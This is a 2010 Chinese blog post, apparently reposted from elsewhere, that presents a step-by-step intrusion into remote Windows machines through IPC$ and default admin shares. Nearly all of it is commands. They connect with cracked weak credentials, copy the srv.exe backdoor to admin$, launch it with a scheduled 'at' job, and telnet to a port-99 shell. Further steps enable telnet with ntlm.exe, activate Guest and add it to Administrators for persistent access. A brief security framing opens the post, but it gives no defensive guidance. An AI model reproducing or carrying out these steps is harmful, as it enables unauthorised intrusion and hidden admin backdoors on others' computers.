記憶盒子

把記憶裝進灰色的盒子,封裝起來,那年那月,重新拾起。

首頁搜索目錄
search
當前主題: 互聯(lián)網絡

網絡安全:利用ipc$和默認共享入侵遠程電腦

作者:Kaka    時間:2010-6-19 10:11:0    瀏覽:    評論:0

電腦如果沒有關閉默認共享,或者啟用了遠程協(xié)助共享,那么就有可能被不法分子入侵,給網絡安全帶來隱患。

這里介紹利用ipc$和默認共享入侵遠程電腦的過程。

1. C:\>net use \\127.0.0.1\IPC$ "密碼" /user:"用戶名"
一般用流光,通過掃描弱口令來得到,管理員帳號和密碼.

2. C:\>copy srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什么地方去了)。

3. C:\>net time \\127.0.0.1
查查時間,發(fā)現(xiàn)127.0.0.1 的當前時間是 2004/6/15 上午 11:00,命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧

5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2004/6/15 上午 11:05,那就準備開始下面的命令。

6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了

7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。

8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現(xiàn)"DONE"的時候,就說明已經啟動正常。然后使用"net start telnet"來開啟Telnet服務!

9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,****作就像在DOS上****作一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈)

為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活

11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼

12. C:\>net localgroup administrators guest /add
將Guest變?yōu)锳dministrator(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計算機)

文章來源:網絡

x

標簽: Windows  

※ 網站速度慢?試試網站自動優(yōu)化工具 ※

上一篇: 提高網站流量的根本手段
下一篇: 令人拍案叫絕的一篇軟文?

發(fā)表評論:

◎歡迎參與討論,請在這里發(fā)表您的看法、交流您的觀點。

訂閱博客                   QQ交流群(312716741)

  • 通過Google訂閱本站 通過鮮果訂閱本站 通過抓蝦訂閱本站
  • 通過QQ郵箱訂閱本站 通過Yahoo訂閱本站 通過有道訂閱本站

Search

最新評論及回復

最近留言

網站分類

Powered By Z-Blog 1.8 Walle Build 91204 Designed by Han'space

Copyright @2009-2024 All Rights Reserved. 粵ICP備14028160號-1

Powered By Z-Blog 1.8 Walle Build 91204
Copyright @2009-2024 All Rights Reserved.